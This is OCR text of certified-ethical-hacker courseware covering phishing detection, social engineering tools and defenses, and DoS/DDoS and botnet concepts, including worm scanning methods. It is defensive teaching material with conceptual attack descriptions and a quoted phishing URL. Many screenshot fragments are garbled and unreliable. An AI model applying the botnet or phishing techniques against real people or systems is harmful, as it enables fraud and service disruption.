Install host security tools such as a firewall and anti-virus on your personal computer Some additional countermeasures against identity theft are as follows: To keep mail secure, empty your mailbox quickly and do not reply to unsolicited email requests asking for personal information. Shred credit card offers and “convenience checks” that are not useful. Do not store any financial information on the system and use strong passwords for all financial accounts. Check telephone and cell phone bills for calls you did not make. Keep your Social Security card, passport, license, and other valuable personal information hidden and secured. Read website privacy policies. Be cautious before clicking on a link provided in an email or instant message. Enter personal information only on secured website pages marked with “https.” Add fraud alerts to the system or device to defend against identity theft. Do not allow family members or friends to open a personal account. Utilize trusted digital wallets that provide high security.

Module 09 Page 1399

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

How to Detect Phishing Emails? Appearsto be froma bank, company, or social networking site, and has a generic greeting Appears to be from a person listed in your email address book Gives a sense of urgency or a veiled threat May contain grammatical/spelling mistakes Includes links to spoofed websites

May contain offers that seem to be too good to be true

Includes official-looking logos and other information taken from legitimate websites May contain a malicious attachment

How to Detect Phishing Emails? To detect phishing Doing so will show then it could be display it’s “From”

emails, first, hover your mouse pointer over the name in the “From” column. whether the original domain name is linked to the sender’s name; if it is not, a phishing email. For example, an email from Gmail.com should probably domain as “gmail.com.”

Check to see if the email provides a URL and prompts the user to click on it. If so, ensure that the link is legitimate by hovering the mouse pointer over it (to display the link’s URL) and ensure it uses encryption (https://). To be on the safe side, always open a new window and visit the site by typing it in directly instead of clicking on the link provided in the email.

Do not provide any information to the suspicious website, as it will likely link directly to the attacker. A few other indicators of phishing emails: =

It seems to be from a bank, company, or social networking site and has a generic greeting

=

It seems to be from a person listed in your email address book

=

It has an urgent tone or makes a veiled threat

=

It may contain grammatical or spelling mistakes

=

It includes links to spoofed websites

=

It may contain offers that seem to be too good to be true

=

It includes official-looking logos and other information taken from legitimate websites

=

It may contain a malicious attachment

Module 09 Page 1400

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Social Engineering

joogle.com/mail/u/O/?ui

Your Apple ID was used to sign in to iCloud on an iPhone 6 ©®

[Intex

x)

[BB Apple Support

12:11 PM (20 minutes ago)

‘Your Apple 1D was used to sign in to iCloud on an iPhone 6 Time:

April 13, 2622

Operating System: 10S 6.0.1

Your Apple 1D was used to sign in to iCloud on an iPhone 6 and your crecit card has been { goed for $1285.54 i “TF you recently signed in to this device. you can disregard this email

If you have not recently signed in to an iPhone with your Apple ID and believe someone may have acesed your account, please click password

4

to confirm your details and change your

To spread awareness on the security issues,

reporting this issue at the link to Reporiyibuse View the attached

TE.

document for your latest invoice

Apple Support

My Apple ID | Support | Privacy Policy Copyright © 2022 Tunes S.ar!, 31-33, rule Sainte Zithe, L-2763 Luxembourg. Alt rights

Figure 9.16: Screenshot Showing an Email with Indications of Phishing

Module 09 Page 1401.

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Anti-Phishing Toolbar |@ The Netcraft anti-phishing community is a

Netcraft

|

giant neighborhood watch scheme, empowering the most alert and most expert members to defend everyone within the community against phishing attacks

CEH {@ PhishTank is a collaborative clearing house for data

|

Phish and information about phishing onthe Internet| Tank | @ Itprovidesan open API for developers and | | researchers to integrate anti-phishing data into their apps

|

MeTCcRAFT

tps //unew phishtank com

Anti-Phishing Toolbar

=

Netcraft Source: https://www.netcraft.com

The Netcraft anti-phishing community is a giant neighborhood watch scheme, empowering the most alert and most expert members to defend everyone within the community against phishing attacks. The Netcraft Toolbar provides updated information about sites that users visit regularly and blocks dangerous sites. The toolbar provides a wealth of information about popular websites. This information will help to make an informed choice about the integrity of those sites. As shown in the screenshot, Netcraft phishing attacks and fraudsters.

Module 09 Page 1402

protects

individuals

and

organizations

from

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

XTi sterepottorhtpv/nmmcen X | SteSloctedNett Etenion +t O

Sy Extension (Net..ft Extension) moz-extension://71314a84-Of-4b32-Bfba-36cd9ee97 1 1f/bloc.

NETCRAFT Suspected Phishing een blocked by the Netcraft acked URL: hxxps: //smb
Details on suspect: x

>

nitpsy/wwwphishtankccom/phish.detailphp?phish id=740662«

©

c

+

+

FS

9

ome

x

PhishTank Home

Add APhish

Verify APhish

Phish Search

Stats

FAQ

Developers

Submission #7486626 is currently ONLINE

2022 10:1 AM by buaya (Current timer Apr 12th 2022 10:25 AM Submits https: //cssogrdtedadyrealpasssb.firebaseapp.com/

Mailing Lists My Account UTC)

As verified by

|

IsNOTa phish

Ed 0%

@ Godaddy

Figure 9.18: Screenshot of PhishTank Some additional tools to detect phishing attempts: =

Scanurl (https://scanurl.net)

=

Isitphishing (https://isitphishing.org)

=

ThreatCop (https://www.threatcop.ai)

=

e.Veritas (https://www.emailveritas.com)

=

Virustotal (https://www.virustotal.com)

Module 09 Page 1404

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Common Social Engineering Targets and Defense Strategies

(q E H

Impersonation, persuasion, intimidation, fake SMS, phone calls, and emails Impersonation, reverse social engineering, iggybacking, tailgating, etc. Shoulder surfing, eavesdropping, ingratiation, etc.

Train employees and help desk staff never to reveal passwords or other information over the phone. Enforce policies for the front office and help desk personnel Train technical support executives and system administrators never to reveal passwordsor other information over the phone or email Implement strict badge, token, or biometric authentication, ‘employee training, and security guards Implement employee training, best practices, and checklists for using passwords. Escort all guests

Impersonation, persuasion, intimidation

Educate vendors about social engineering Lock and monitor mail room, train employees

Company's a) Executives

Theft, damage, or forging of mails, ‘Attempting to gain access, remove equipment, and/or attach a protocol analyzer to extract confidential data Fake SMS, phone calls, and emails to grab confidential data

Dumpsters

Dumpster diving

Loe re

nane

Technical support and system administrators Perimeter securit a Office

Vendors of the target organization Mail room Machi hone closet oes

Common

Eavesdropping, shoulder surfing, impersonation, Persuasion, and intimidation

Keep phone closets, server rooms, etc. locked at all times and keep updated inventory on equipment Train executives never to reveal identity, passwords, or other confidential information over the phone or email Keep all trash in secured, monitored areas; shred important data; and erase magnetic media

Social Engineering Targets and Defense Strategies

Attackers implement various social engineering techniques to trick people into providing sensitive information about their organizations, thus helping attackers to launch malicious activities. These techniques are used on privileged individuals or those who deal with important information. Below table shows common social engineering targets, various social engineering techniques that attackers use, and the defense strategies to counter these attacks. Social Engineering Targets

Front office and help desk

Technical support and system administrators

Perimeter security

Module 09 Page 1405

Attack Techniques

Defense Strategies

Eavesdropping, shoulder surfing,

impersonation, persuasion, and intimidation

Impersonation, persuasion, intimidation, fake SMS, phone calls, and emails

Impersonation, reverse social

engineering, piggybacking, tailgating, etc.

Train employees and help desk staff never to reveal passwords or other information over the phone. Enforce policies for the front office and help desk personnel Train technical support executives and system administrators never to reveal passwords or other information over the phone or email Implement strict badge, token, or biometric authentication, employee

training, and security guards

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Office

Vendors of the

target organization Mail room

Machine room and Phone closet

Company’s P . Y Executives

Shoulder surfing,

eavesdropping, and ingratiation

Impersonation, persuasion, and

Exam 312-50 Certified Ethical Hacker

Implement employee training, best practices, and checklists for using passwords. Escort all guests Educate vendors about social

intimidation

engineering.

Theft, damage, or forging of mails

Lock and monitor the mailroom, train

Attempting to gain access, remove equipment, or attach a protocol analyzer to extract confidential data Fake SMS, phone calls, and

. . emails designed to grab 7 confidential data

employees Keep phone closets, server rooms, and

other spaces locked at all times and keep an updated inventory of equipment Train executives never to reveal identity,

. . passwords, or other confidential . F information over the phone or email Keep all trash in secured, monitored

Dumpsters

Dumpster diving

areas; shred important data; and erase magnetic media

Table 9.1: Common social engineering targets and defense strategies

Module 09 Page 1406

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Social Engineering Tools: Social Engineering Toolkit (SET) ‘SpeedPhish Framework (SPF) Itps://othabcom

|@ The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering EQ

Gophish



‘https://getgophish.com

[x]

King Phisher

fmt

https://github.com

LUCY SECURITY etps:/ fou lcysecurty.com

Ietes/Jruu trustedsec Com Copyright © by

MSI Simple Phish ‘etps://microsolved.com Al Rights Reserved. Reproduction is

Social Engineering Tools =

Social Engineering Toolkit (SET) Source: https://www.trustedsec.com The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing via social engineering. It is a generic exploit designed to perform advanced attacks against human elements to compromise a target and make them offer sensitive information. SET categorizes attacks such as email, web, and USB attacks according to the attack vector used to trick humans. The toolkit attacks human weakness, exploiting the trusting, fearful, greedy, and the helpful nature of humans.

Module 09 Page 1407

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Figure 9.19: Screenshot of SET showing menu and attack options Some social engineering tools are listed below:

=

SpeedPhish Framework (SPF) (https://github.com)

=

Gophish (https://getgophish.com)

=

King Phisher (https://github.com)

=

LUCY SECURITY (https://www.lucysecurity.com)

=

MSI Simple Phish (https://microsolved.com)

Module 09 Page 1408

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Audit Organization's Security for Phishing Attacks using

OhPhish

C IE H

Pood both

|@ OhPhish is a web-based portal to test employees’

susceptibility to social engineering attacks

@ OhPhish is a phishing simulation tool that provides the organization with a

platform to launch phishing simulation campaigns on its employees

SHPHISH

Fortifying Front Lines >etps/portol.ohphish com

Audit Organization's Security for Phishing Attacks using OhPhish The primary objective of launching phishing campaigns against employees of the client organization is to assess the employees’ susceptibility to phishing attacks and help the organization reduce risks that arise when the employees fall prey to phishing attacks sent by cyber-threat actors.

OhPhish Source: https://portal.ohphish.com OhPhish is a web-based portal for testing employees’ susceptibility to social engineering attacks. It is a phishing simulation tool that provides the organization with a platform to launch phishing simulation campaigns on its employees. The platform captures the responses and provides MIS reports and trends (on a real-time basis) that can be tracked according to the user, department, or designation. OhPhish can be used to audit an organization’s security for phishing attacks various phishing methods such as Entice to Click, Credential Harvesting, Attachment, Training, Vishing, and Smishing.

Module 09 Page 1409

using Send

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Dashboard | OhPhish

Exam 312-50 Certified Ethical Hacker

x ‘ohphish.com,

20%

Dashboard

minute

To get th To get star Entice to Click

Send Attachment

Live Phishing Campaign: Campaign

Campsicn Tipe

Status

ed Training Started Stopped Scheduled Seat Clicked Compliance Crestor Action

Figure 9.20: Screenshot of OhPhish

Module 09 Page 1410

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Module Summary a

Q

=

CE H

In this module, we have discussed the following:

> Social engineering concepts along with various kinds of social engineering attacks ,

>

Human-, computer-, and mobile-based social engineering techniques

> Insider threats and the various forms they can take > Impersonation on social networking sites > Identity theft and the various forms it can take

> Details of various countermeasures that can defend an organization against social engineering attacks, phishing attacks, insider threats, and identity theft Q

Inthe next module, we will see how attackers, as well as ethical hackers and penetration testers, perform DoS/DDoS attacks

Module Summary This module discussed social engineering concepts along with various phases of social engineering attack. It also discussed various human-based, computer-based, and mobile-based social engineering techniques. The module discussed insider threats, including the various types of insider threats. It gave an overview of impersonation on social networking sites. It also discussed identity theft and the types of identity theft. The module ended with a detailed discussion of various signs to watch for and countermeasures to employ in order to defend against social engineering attacks, phishing attacks, insider threats, and identity theft. The next module will show how attackers, as well as ethical hackers and pen testers, perform

DoS/DDoS attacks.

Module 09 Page 1411

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

C\EH

EC-Council

Certified |) Ethical Hacker

MODULE

10

— "DENIAL. OF- SFRVICE —

EC-COUNCIL OFFICIAE*CURRICULA

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

CEH

o

o

LEARNING

OBJECTIVES

LO#01: Summarize DoS/DDoS Concepts

©

LO#04: Present DDoS Case Study

LO#02: Explain Botnet Network

©

LO#05: Explain DoS/DDoS Attack Countermeasures

LO#03: Demonstrate Different DoS/DDoS Attack Techniques

Strictly Prohibited

Learning Objectives Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks are a major threat to computer networks. These attacks attempt to make a machine or network resource unavailable to its authorized users. Usually, DoS/DDoS attacks exploit vulnerabilities in the implementation of the Transmission Control Protocol (TCP)/Internet Protocol (IP) model or bugs in a specific operating system (OS). At the end of this module, you will be able to do the following: =

Describe DoS/DDoS concepts

=

Describe botnets

=

Understand various DoS/DDoS attack techniques

=

Explain different DoS/DDoS attack tools

=

Illustrate DoS/DDoS case studies

=

Apply best practices to mitigate DoS/DDoS attacks

=

Apply various DoS/DDoS protection tools

Module 10 Page 1415

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

CEH

LO#01: Summarize DoS/DDoS Concepts

DoS/DDoS Concepts For a good understanding of DoS/DDoS attacks, one must be familiar with related concepts in advance. This section defines DoS and DDoS attacks and discusses how DDoS attacks work.

Module 10 Page 1416

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

What is a DoS Attack?

CE H

@ Denial-of-Service (DoS) is an attack on a computer or network that reduces, restricts,or prevents accessibility of system resources to its legitimate users @ Ina DoS attack, attackers flood the victim system with non-legitimate service requestsor traffic to overload its resources Malicious Traffic

& A

Regular Traffic

Malicious traffic consumes all the available bandwidth >.

attack

MEE

traffic

Regular Traffic

Server Cluster

What is a DoS Attack? A DoS attack is an attack on a computer or network that reduces, restricts, or prevents access to system resources for legitimate users. In a DoS attack, attackers flood a victim’s system with nonlegitimate service requests or traffic to overload its resources and bring down the system, leading to the unavailability of the victim’s website or at least significantly reducing the victim’s system or network performance. The goal of a DoS attack is to keep legitimate users from using the system, rather than to gain unauthorized access to a system or to corrupt data.

The following are examples for types of DoS attacks: =

Flooding the victim’s system with more traffic than it can handle

=

Flooding a service (e.g., Internet Relay Chat (IRC)) with more events than it can handle

=

Crashing a TCP/IP stack by sending corrupt packets

=

Crashing a service by interacting with it in an unexpected manner

=

Hanging a system by causing it to go into an infinite loop

Module 10 Page 1417

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Malicious Traffic Malicious traffic consumes

all the available bandwidth

Internet (OD HE

Regular Traffic

Attack Traffic SRegular Traffic

Server Cluster

Figure 10.1: Schematic of a DoS attack

DoS attacks following:

have

various

forms

and

target various

services.

The

attacks

=

Consumption of resources

=

Consumption of bandwidth, disk space, CPU time, or data structures

=

Actual physical destruction or alteration of network components

=

Destruction of programming and files in a computer system

may

cause

the

In general, DoS attacks target network bandwidth or connectivity. Bandwidth attacks overflow the network with a high volume of traffic by using existing network resources, thereby depriving legitimate users of these resources. Connectivity attacks overflow a system with a large number of connection requests, consuming all available OS resources to prevent the system from processing legitimate user requests.

Consider a food catering company that conducts much of its business over the phone. If an attacker wants to disrupt this business, they need to find a way to block the company’s phone lines, which would make it impossible for the company to do business. A DoS attack works along the same lines—the attacker uses up all the ways to connect to the victim’s system, making legitimate business impossible.

DoS attacks are a kind of security breach that does not generally result in the theft of information. However, these attacks can harm the target in terms of time and resources. Furthermore, security failure might cause the loss of a service such as email. In the worst-case scenario, a DoS attack can cause the accidental destruction of the files and programs of millions of people who were connected to the victim’s system at the time of the attack.

Module 10 Page 1418

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

What is a DDoS Attack? ‘@

CE H

Distributed denial-of-service (DDoS) is a coordinated attack that involves a multitude of compromised systems (Botnet) attacking a single target, thereby denying service to users of the targeted system

infects Handlemnt sion the Internet

DDoS? How kedo Work Attsc

Impact of DDoS

attacker sets 2 Ie

@ Loss of Goodwill

handler system

@

Disabled Network

@

Financial Loss

@

Disabled Organization

cence raed tack

Handler

ar What is a DDoS Attack? Source: https://www.techtarget.com A DDoS attack is a large-scale, coordinated attack on the availability of services on a victim’s system or network resources, and it is launched indirectly through many compromised computers (botnets) on the Internet. As defined by the World Wide Web Security FAQ, “A distributed denial-of-service (DDoS) attack uses many computers to launch a coordinated DoS attack against one or more targets. Using client/server technology, the perpetrator is able to multiply the effectiveness of the denial of service significantly by harnessing the resources of multiple unwitting accomplice computers, which serve as attack platforms.” The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to legitimate users. The services under used to launch the performing a DDoS making it difficult to

attack belong to the “primary victim,” whereas the compromised systems attack are called “secondary victims.” The use of secondary victims in attack enables the attacker to mount a large and disruptive attack while track down the original attacker.

The primary objective of a DDoS attack is to as possible. In general, attackers use a vulnerable systems. After gaining access to DDoS software on these systems at the time

first gain administrative access on as many systems customized attack script to identify potentially the target systems, the attacker uploads and runs chosen to launch the attack.

DDoS attacks have become popular because of the easy accessibility of exploit plans and the negligible amount of brainwork required to execute them. These attacks can be very dangerous because they can quickly consume the largest hosts on the Internet, rendering them useless.

Module 10 Page 1419

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

The impacts of DDoS include the loss of goodwill, disabled organizations.

disabled

networks,

financial

losses, and

How do DDoS Attacks Work? In a DDoS attack, many applications barrage a target browser or network with fake exterior requests that make the system, network, browser, or site slow, useless, and disabled or unavailable. The attacker initiates the DDoS attack by sending a command to zombie agents, which are Internet-connected computers compromised by an attacker through malware programs to perform various malicious activities through a command and control (C&C) server. These zombie agents send a connection request to a large number of reflector systems with the spoofed IP address of the victim, which causes the reflector systems to presume that these requests originate from the victim’s machine instead of the zombie agents. Hence, the reflector systems send the requested information (response to the connection request) to the victim. Consequently, the victim’s machine is flooded with unsolicited responses from several reflector computers simultaneously, which may either reduce the performance or cause the victim’s machine to shut down completely. Handler

infects

a large numberof

computers over the Internet

Attacker

sets a

handler system

Poy.)

Zombie systems are instructed to attack a target server

DEERE

Compromised PCs (Zombies) Figure 10.2: Schematic of a DDoS attack

Module 10 Page 1420

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

CEH

LO#02: Explain Botnet Network

Botnets The term “bot” is a contraction of “robot” and refers to software applications that run automated tasks over the Internet. Attackers use bots to infect a large number of computers that form a network, or “botnet,” allowing them to launch DDoS attacks, generate spam, spread viruses, and commit other types of crime. This section deals with organized cyber-crime syndicates, organizational charts, botnets, and botnet propagation techniques; botnet ecosystems; scanning methods for finding vulnerable machines; and the propagation of malicious code.

Module 10 Page 1421

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Organized Cyber Crime: Organizational Chart Criminal Boss

Hierarchical Setup

Underboss: Trojan Provider and ‘Managerof Trojan Command and Control

‘Attackers (Crimeware Toolkit Owners)

a> wansser Affiliation Network

@.:

oe

Data Reseller

CE H

a>¥ vege

t Affiliation Network

3

Qa.

@.%

r~) Stolen Data Reseller

@

Stolen Data Reseller

Copyright © by

Organized Cyber Crime: Organizational Chart Organized Crime Syndicates While cyber criminals worked independently in the past, they now tend to operate in organized groups. They are increasingly associated with organized crime syndicates and take advantage of the sophisticated techniques of these syndicates to engage in illegal activity, usually for monetary benefit. There are organized groups of cyber criminals who work in a hierarchical set up with a predefined revenue-sharing model, which is a kind of major corporation that offers criminal services. Organized groups create and rent botnets and offer various services ranging from the development of malware and hacking of bank accounts to the deployment of massive DoS attacks against any target for a price. For example, an organized crime syndicate might perform a DDoS attack against a bank to divert the attention of the bank’s security team while they clean out bank accounts with stolen account credentials. The growing involvement of organized criminal syndicates in politically motivated cyber warfare and hacktivism is a matter of concern for national security agencies. Cybercrime features a complicated range of players, and cyber criminals are paid according to the task they perform or the position they hold. The head of the cybercrime organization (i.e., the boss) acts as a business entrepreneur. The boss does not commit any crimes directly. Immediately below the boss in the organizational hierarchy is the “underboss,” who sets up a C&C server and crimeware toolkit database to manage the implementation of attacks and provide Trojans. Below the underboss are various “campaign managers” with their own affiliation networks for implementing attacks and stealing data. Finally, resellers sell the stolen

data.

Module 10 Page 1422

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

ez

Hierarchical Setup

Criminal Boss

v

Underboss: Trojan Provider and Manager of Trojan Command and Control

Attackers (Crimeware Toolkit Owners)

v

Campaign Manager

Campaign Manager

v

“@* > Affiliation Network

pend Aliliation Network

£a8

Alilation Network

v

@ Stolensai Data Reseller r="

2 Stolen . Data Reseller r=" Figure 10.3:

Module 10 Page 1423

2...Stolen Data Reseller r~"

jierarchical setup of a cybercrime organization

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Botnets ‘@ ©@ A

CE H

Bots are software applications that run automated tasks over the Internet and perform simple, repetitive tasks, such as web spidering and search engine indexing

j

botnet is a huge network of compromised systems and can be used by an attacker to launch

denial-of-service attacks

Bots connectto C&C

=

Bo SMe Gla|

SO iiiaeesnie control Center “> Dn } c&Chandler

Bot Command and

Attacker

>

3

> Zombies

Target Server

=?

Bot looks for other vulnerable systemsand infects them to create Botnet

Victim (Bot)

Botnets

Bots are used for benign data collection or data mining activities, such as “web spidering,” as well as to coordinate DoS attacks. The main purpose of a bot is to collect data. There are different types of bots, such as Internet bots, IRC bots, and chatter bots. Examples for IRC bots are Cardinal, Sopel, Eggdrop, and EnergyMech. A botnet (a contraction of “roBOT NETwork”) is a group of computers “infected” by bots; however, botnets can be used for both positive and negative purposes. As a hacking tool, a botnet is composed of a huge network of compromised systems. A relatively small botnet of 1,000 bots has a combined bandwidth larger than the bandwidth of most corporate systems. The advent of botnets led to an enormous increase in cybercrime. Botnets form the core of the cybercriminal activity center that links and unites various parts of the cybercriminal world. Cybercriminal service suppliers are a part of a cybercrime network. They offer services such as malicious code development, bulletproof hosting, the creation of browser exploits, and encryption and packing. Malicious code is the primary tool used by criminal organizations to commit cybercrimes. Botnet owners order both bots and other malicious programs such as Trojans, viruses, worms, keyloggers, and specially crafted applications to attack remote computers via networks. Developers offer malware services on public sites or closed Internet resources.

Botnets are agents that an intruder can send to a server system to perform an illegal activity. Botnets run hidden programs that allow the identification of system vulnerabilities. Attackers can use botnets vulnerabilities.

Module 10 Page 1424

to

perform

the

tedious

tasks

involved

in

probing

a

system

for

known

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Attackers can use botnets to perform the following: DDoS attacks: Botnets can generate DDoS attacks, which consume the bandwidth of the victim’s computers. Botnets can also overload a system, wasting valuable host system resources and destroying network connectivity. Spamming: Attackers use a SOCKS proxy for spamming. They harvest email addresses from web pages or other sources. Sniffing traffic: A packet sniffer observes the data traffic entering a compromised machine. It allows an attacker to collect sensitive information such as credit card numbers and passwords. The sniffer also allows an attacker to steal information from one botnet and use it against another botnet. In other words, botnets can rob one another. Keylogging: Keylogging is a method of recording the keys typed on a keyboard, and it provides sensitive information such as system passwords. Attackers use keylogging to harvest account login information for services such as PayPal. Spreading new malware: Botnets can be used to spread new bots.

Installing advertisement add-ons: Botnets can be used to perpetrate a “click fraud” by automating clicks. Google AdSense abuse: Some companies permit showing Google AdSense ads on their websites for economic benefits. Botnets allow an intruder to automate clicks on an ad, producing a percentage increase in the click queue. Attacks on IRC chat networks: Also called clone attacks, these attacks are similar to a DDoS attack. A master agent instructs each bot to link to thousands of clones within an IRC network, which can flood the network.

Manipulating online polls and games: Every botnet has a unique address, enabling it to manipulate online polls and games. Mass identity theft: Botnets can send a large number of emails while impersonating a reputable organization such as eBay. This technique allows attackers to steal information for identity theft. The below figure illustrates how an attacker launches a botnet-based DoS attack on a target server. The attacker sets up a bot C&C center, following which they infect a machine (bot) and compromises it. Later, they use this bot to infect and compromise other vulnerable systems available in the network, resulting in a botnet. The bots (also known as zombies) connect to the C&C center and awaits instructions. Subsequently, the attacker sends malicious commands to the bots through the C&C center. Finally, as per the attacker’s instructions, the bots launch a DoS attack on a target server, making its services unavailable to legitimate users in the network.

Module 10 Page 1425

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Bots connect to C&C handler and wait for instructions Attacker sends commands to the

Bot Command and

bots throwgh CRC

Control Center

Target Server

A

Setsa bot cac handler e Attacker

Attacker infects a machine

Bot looks for other vulnerable systems and infects them to create Botnet

Victim (Bot) Figure 10.4: Botnet-based DDoS attack

Module 10 Page 1426

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Exam 312-50 Certified Ethical Hacker

Denial-of-Service

Compromise

| legitimorate | ne sei cious | ebste “agmal

phiching/ocal {

eatenew

iA

ATypical Botnet Setup

x=

Ethical Hacking and Countermeasures

Toolkit database

website

acious redbecsure tothe

Molicious Website/Compromised Legitimate Website

Users visit the eacticionsy compromised legitimate website

x

A Typical Botnet Setup Affiliation Network

Attacker

Sets a C&C center and Crimeware Toolkit database

Compromise Redirect vicins tomatcne | wepste leitaor website using

phishing/social ; “Teetenew ‘malicious

engineering, o nel

i, te

Bots will

anee Go)@

website

Malicious

Website/Compromised

Web mate ise

Malicious Websites

connect

5

Users visit the

‘Attacks the primary target

malicious/ d te omise compr legitimate websi

Organization Figure 10.5: Typical botnet setup

Module 10 Page 1427

Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Botnet Ecosystem

=e =—

I$: Ucenses MP3, Divx

Phishing

Ccrimeware Toolkit Database

Financial Diversion

Trojan Command ‘and Control Center Client Side Vulnerability

—s

Malware Market

Extortion

&

H

&

Qa Stock Fraud

Redirect,

Spam Mass Malling

+

a

Oo) Scams

Adverts

Figure 10.6: Botnet ecosystem

Module 10 Page 1428

Ethical Hacking and Countermeasures Copyright © by EC-Col All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Scanning Methods for Finding Vulnerable Machines

CE H

Random Scanning

|@ The infected machine probes IP addresses randomly from the target network IP range and checks for vulnerabilities

Hit-list Scanning

@ Anattacker first collects a list of potentially vulnerable machines and then scans them to find vulnerable machines

Topological Scanning

@ Ituses information obtained from an infected machine to find new vulnerable machines

Subnet Local Scanning

|@ The infected machine looks for new vulnerable machines in its own local network

Permutation Scanning

@ Ituses a pseudorandom permutation list of IP addresses to find new vulnerable machines

Scanning Methods for Finding Vulnerable Machines Discussed network:

below are scanning methods

used by an attacker to find vulnerable machines in a

Random Scanning In this technique, the infected machine (an attacker’s machine or a zombie) probes IP addresses randomly in the target network’s IP range and checks their vulnerability. On finding a vulnerable machine, it hacks and attempts to infect the vulnerable machine by installing the same malicious code installed on it. This technique generates significant traffic because many compromised machines probe and check the same IP addresses. Malware propagates quickly in the initial stage, and the speed of propagation reduces as the number of new IP addresses available decreases with time.

Hit-list Scanning Through scanning, an attacker first collects a list of potentially vulnerable machines and then creates a zombie army. Subsequently, the attacker scans the list to find a vulnerable machine. On finding one, the attacker installs malicious code on it and divides the list in half. The attacker continues to scan one half, whereas the other half is scanned by the newly compromised machine. This process keeps repeating, causing the number of compromised machines to increase exponentially. This technique ensures the installation of malicious code on all the potentially vulnerable machines in the hit list within a short time.

Module 10 Page 1429

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

